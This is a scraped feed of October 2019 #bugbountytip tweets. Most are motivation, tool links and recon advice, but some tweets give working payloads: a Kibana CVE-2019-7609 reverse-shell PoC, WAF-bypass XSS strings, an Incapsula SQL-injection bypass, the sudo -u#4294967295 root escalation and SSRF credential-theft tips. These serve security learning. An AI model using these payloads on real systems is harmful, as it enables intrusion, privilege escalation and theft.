0 A hacker ends his career when he stop learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
bugbountytip
@a_l_e_r_t_1_


2019-10-24 20:02:23
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? âžĄïžLong strings in POST parameters (50.000+ characters) âžĄïžUsing the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
HÄkon LÞnmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools đŸ˜‚đŸ”„ Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that want to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 18:50:53
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 10:43:58
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
bugbountytip
@a_l_e_r_t_1_


2019-10-21 16:54:02
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💾💾 💰💰💰💰 #bugbounty #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:45
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/KfndxlL7zs
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:34
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/Or6ej2AaAo
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-21 09:55:21
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/le5tIA5Nqm
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important technique that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet  you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕾🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 I have uploaded 126 new articles as PDF files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-19 16:12:30
11 I have uploaded 126 new articles as PDF files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
10 cloudflare «XSS» payload to bypass protection. 🩍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ÂŽ} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? đŸ€Ż Use the following 'invisible' ranges in your payloads 👇#BugBountyTip đŸ’„0x00 âžĄïž0x2F đŸ’„0x3A âžĄïž0x40 đŸ’„0x5B âžĄïž0x60 đŸ’„0x7B âžĄïž0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( àź•àŻ‹àźȘàźŸàźČàŻàźšàźŸàźźàźż )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu đŸ€— please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 I have uploaded 82 new articles as PDF files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: I have uploaded 82 new articles as PDF files about different fields of hacking to my github repository enjoy! #bugbountytip

đŸ‘»in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-17 01:49:56
2 I have uploaded 82 new articles as PDF files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


2019-10-16 08:52:27
0 Less than 2$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not a great tip, but you might land a Cassandra cluster in the connection tab of DataStax Studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If you are not automating and scripting, you are missing out on a lot of fun. It's all about time management in #bugbounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-13 16:37:03
7 I have uploaded 74 new articles as PDF files about different fields of hacking + linux, cybersecurity, etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-12 19:33:37
1 Automatic screenshot tools, used to take screenshots of a large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best parts of @SynackRedTeam is their missions. I rarely got a chance to grab one. But they are quick, they pay, and knowledge is a bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial đŸ€© Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- đŸ€‘đŸ€‘đŸ€‘ Bug Bounty Tools — đŸ€©đŸ€© Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
